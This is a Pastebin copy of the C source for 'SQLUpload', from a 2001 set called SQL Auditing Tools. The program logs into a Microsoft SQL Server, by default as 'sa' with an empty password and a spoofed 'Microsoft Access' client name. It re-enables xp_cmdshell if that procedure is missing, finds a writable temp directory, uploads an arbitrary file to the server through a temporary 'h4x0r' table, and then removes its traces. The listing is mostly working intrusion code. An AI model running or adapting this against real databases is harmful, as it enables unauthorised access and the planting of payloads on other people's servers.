API tools faq
paste
Advertisement
Xylitol

SQL Auditing Tools

Xylitol
Jan 28th, 2013
311
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 7.50 KB | None | 0 0
raw download clone embed print report
  1. /*
  2.    SQL Auditing Tools
  3.    Copyright (C) Patrik Karlsson 2001
  4.    
  5.    This program is free software; you can redistribute it and/or modify
  6.    it under the terms of the GNU General Public License as published by
  7.    the Free Software Foundation; either version 2 of the License, or
  8.    (at your option) any later version.
  9.    
  10.    This program is distributed in the hope that it will be useful,
  11.    but WITHOUT ANY WARRANTY; without even the implied warranty of
  12.    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  13.    GNU General Public License for more details.
  14.    
  15.    You should have received a copy of the GNU General Public License
  16.    along with this program; if not, write to the Free Software
  17.    Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  18. */
  19.  
  20. #include <tds.h>
  21. #include <tdsconvert.h>
  22. #include "sqlupload.h"
  23. #include "sqllib.h"
  24. #include "util.h"
  25. #include "constants.h"
  26. #include <getopt.h>
  27.  
  28. /*
  29.   Set a few default values
  30. */
  31. TDSLOGIN *set_target_defaults(TDSLOGIN *login) {
  32.  
  33.   login = tds_alloc_login();
  34.   tds_set_passwd(login, "");
  35.   tds_set_user(login, "sa");
  36.   tds_set_app(login, "Microsoft Access");
  37.   tds_set_host(login, "xxx");
  38.   tds_set_library(login,"TDS-Library");
  39.   tds_set_client_charset(login,"iso_1");
  40.   tds_set_language(login, "us_english");
  41.   tds_set_server(login, "");
  42.   tds_set_packet(login, 512);
  43.   tds_set_port(login, 1433);
  44.  
  45.   return login;
  46.  
  47. }
  48.  
  49. /*
  50.   Output usage for l00sers
  51. */
  52. void usage(char **argv) {
  53.  
  54.   printf("\tSQLUPLOAD %s by [email protected]\n",
  55.      SQLTOOLS_VERSION);
  56.   printf("\t------------------------------------\n");
  57.   printf("\tusage: %s [options]\n\n", argv[0]);
  58.   printf("\t\t-i* <ipaddress> to probe\n");
  59.   printf("\t\t-t  port (default 1433)\n");
  60.   printf("\t\t-f* <filename> to upload\n");
  61.   printf("\t\t-u username\n");
  62.   printf("\t\t-p password\n");
  63.   printf("\t\t-T path to tempdir if not autodetected\n");
  64.   printf("\t\t-h this\n");
  65.   printf("\t\t-v verbose\n\n");
  66.  
  67. }
  68.  
  69. /*
  70.   Check some stuff and start uploading
  71. */
  72. int SQLUpload(struct args_struct args) {
  73.  
  74.   /* dirs to try to upload to */
  75.   char *pDirs[5] = {"c:\\temp", "c:\\winnt\\temp", "d:\\temp",
  76.             "e:\\temp", "c:\\"};
  77.   int i, nDirCount = 4;
  78.  
  79.   TDSLOGIN *login = NULL;
  80.   TDSSOCKET *tds;
  81.   TDSCONTEXT *context;
  82.   char sTMP[256];
  83.   char *pUploadFileName;
  84.   char bLooser = 0;
  85.   const char* p;
  86.  
  87.   memset(sTMP, 0, sizeof(sTMP));
  88.  
  89.   /* check if the file actually exists */
  90.   if ( !fileExist(args.filename) ) {
  91.     fprintf(stderr, "ERROR: Could not find filename: %s\n", args.filename);
  92.     exit(1);
  93.   }
  94.  
  95.   pUploadFileName = getFilenameFromPath(args.filename);
  96.   login = set_target_defaults(login);
  97.  
  98.   /* no username supplied, assuming sa */
  99.   if ( strlen(args.sUser) == 0 )
  100.     strcpy(args.sUser, "sa");
  101.  
  102.   /* set the parameters of the login struct */
  103.   tds_set_server(login, args.sIP);
  104.   tds_set_passwd(login, args.sPass);
  105.   tds_set_user(login, args.sUser);
  106.   tds_set_port(login, args.nPort);
  107.   if (args.sUser && (p=strchr(args.sUser,'\\')) == NULL) {
  108.       tds_set_version(login,(short) 4,(short) 2);
  109.   }
  110.      
  111.  
  112.   if ( args.verbose )
  113.     printf("-- Logging in to %s --\n", args.sIP);
  114.  
  115.   context = tds_alloc_context();
  116.   if( context->locale && !context->locale->date_fmt ) {
  117.       /* set default in case there's no locale file */
  118.       context->locale->date_fmt = strdup("%b %e %Y %l:%M%p");
  119.   }
  120.  
  121.   tds = tds_alloc_socket(context, 512);
  122.   tds_set_parent(tds, NULL);
  123.   connect_info = tds_read_config_info(NULL, login, context->locale);
  124.   /* try to login */
  125.   /* if( (tds = tds_connect(login,context,NULL)) !=NULL ) {*/
  126.   if( (!connect_info || tds_connect(tds,connect_info)) != TDS_FAIL ) {
  127.       tds_free_connect(connect_info);
  128.  
  129.     /* check for xp_cmdshell */
  130.     if ( !ifExistsXP(tds, "xp_cmdshell") ) {
  131.       fprintf(stderr, "WARNING: could not find xp_cmdshell\n");
  132.       fprintf(stderr, "INFO: Trying to add xp_cmdshell\n");
  133.  
  134.       if ( sp_addextendedproc(tds, "xp_cmdshell", "xpsql70.dll") )
  135.     fprintf(stderr, "INFO: Added xp_cmdshell\n");
  136.       else {
  137.     fprintf(stderr, "WARNING: Failed to add xp_cmdshell\n");
  138.     sqlExec(tds, "drop procedure xp_cmdshell\n");
  139.       }
  140.  
  141.       bLooser = 1;
  142.  
  143.     }
  144.  
  145.     /* drop any old 31337 h4x0r table */
  146.     dropHaxorTable(tds);
  147.  
  148.     /* no path supplied, try to find one */
  149.     if ( strlen(args.sTempPath) == 0 ) {
  150.  
  151.       if ( args.verbose )
  152.     printf("-- Searching for temp path --\n");
  153.  
  154.       /* try to locate a suitable upload dir */
  155.       for ( i=0; i<nDirCount; i++ ) {
  156.     if ( dirExists(tds, pDirs[i]) )
  157.       strcpy(args.sTempPath, pDirs[i]);
  158.       }
  159.  
  160.       /* no exploitdir found */
  161.       if ( strlen(args.sTempPath) == 0 ) {
  162.     tds_free_login(login);
  163.     fprintf(stderr, "ERROR: No temp path found\n");
  164.     return FALSE;
  165.       }
  166.  
  167.     }
  168.     /* the user supplied a upload dir */
  169.     else {
  170.       if ( !dirExists(tds, args.sTempPath) ) {
  171.     tds_free_login(login);
  172.     fprintf(stderr, "ERROR: The temp path was not found\n");
  173.     return FALSE;
  174.       }
  175.     }
  176.  
  177.     fprintf(stdout, "Your file will be in %s\n", args.sTempPath);
  178.  
  179.     /* create the 31337 h4x0r table */
  180.     if ( !createHaxorTable(tds) )
  181.       printf("Error creating haxortable!\n");
  182.  
  183.     if ( args.verbose )
  184.       printf("-- Uploading %s --\n", args.filename);
  185.  
  186.     /* do the actual uploading */
  187.     if ( uploadFile(tds, args.filename, pUploadFileName, args.sTempPath) != TRUE )
  188.       fprintf(stderr, "ERROR: Error uploading file!\n");
  189.  
  190.     /* drop the souper secret 31337 h4x0r table */
  191.     if ( !dropHaxorTable(tds) ) {
  192.       printf("Error dropping haxortable!\n");
  193.       return FALSE;
  194.     }
  195.    
  196.   }
  197.   else {
  198.     fprintf(stderr, "ERROR: Login failed ...\n");
  199.     return FALSE;
  200.   } /* end if connect */
  201.  
  202.   /* free willy */
  203.  
  204.   /* Should we drop the xp_cmdshell ? */
  205.   if ( bLooser )
  206.     sqlExec(tds, "drop procedure xp_cmdshell");
  207.  
  208.   tds_free_login(login);
  209.   free(pUploadFileName);
  210.  
  211.   return TRUE;
  212.  
  213. }
  214.  
  215. /*
  216.   Initialize all arguments
  217. */
  218. void initArguments(struct args_struct *pArgs) {
  219.  
  220.   pArgs->verbose = FALSE;
  221.   memset(pArgs->sIP, 0, sizeof(pArgs->sIP));
  222.   memset(pArgs->sUser, 0, sizeof(pArgs->sUser));
  223.   memset(pArgs->sPass, 0, sizeof(pArgs->sPass));
  224.   memset(pArgs->sTempPath, 0, sizeof(pArgs->sTempPath));
  225.   memset(pArgs->filename, 0, sizeof(pArgs->filename));
  226.   pArgs->nPort = 1433;
  227.  
  228. }
  229.  
  230. /*
  231.   MAIN
  232. */
  233. int main(int argc, char **argv) {
  234.  
  235.   struct args_struct args;
  236.   int c = 0;
  237.  
  238.   initArguments(&args);
  239.  
  240.   while (1) {
  241.  
  242.     c = getopt (argc, argv, "i:u:p:vt:hf:T:");
  243.  
  244.     if ( c == -1 )
  245.       break;
  246.  
  247.     switch (c) {
  248.      
  249.     case 'f':
  250.       if ( strlen(optarg) <= sizeof(args.filename) ) {
  251.     strncpy(args.filename, optarg, strlen(optarg));
  252.       }
  253.       break;
  254.  
  255.     case 'i':
  256.       if ( strlen(optarg) <= sizeof(args.sIP) ) {
  257.     strncpy(args.sIP, optarg, strlen(optarg));
  258.       }
  259.       break;
  260.  
  261.     case 'u':
  262.       strncpy(args.sUser, optarg, strlen(optarg));
  263.       break;
  264.  
  265.     case 'h':
  266.       usage(argv);
  267.       exit(1);
  268.       break;
  269.  
  270.     case 'p':
  271.       strncpy(args.sPass, optarg, strlen(optarg));
  272.       break;
  273.  
  274.     case 'v':
  275.       args.verbose = TRUE;
  276.       break;
  277.  
  278.     case 't':
  279.       args.nPort = atoi(optarg);
  280.       break;
  281.  
  282.     case 'T':
  283.       strcpy(args.sTempPath, optarg);
  284.       break;
  285.  
  286.     default:
  287.       usage(argv);
  288.       exit(1);
  289.     }
  290.  
  291.   }
  292.  
  293.   /* check for needed params */
  294.   if ( strlen(args.sIP) == 0 ) {
  295.     usage(argv);
  296.     exit(1);
  297.   }
  298.  
  299.   fprintf(stdout, "SQLUpload by Patrik Karlsson "
  300.       "<[email protected]>\n\n");
  301.  
  302.   return SQLUpload(args);
  303.  
  304. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!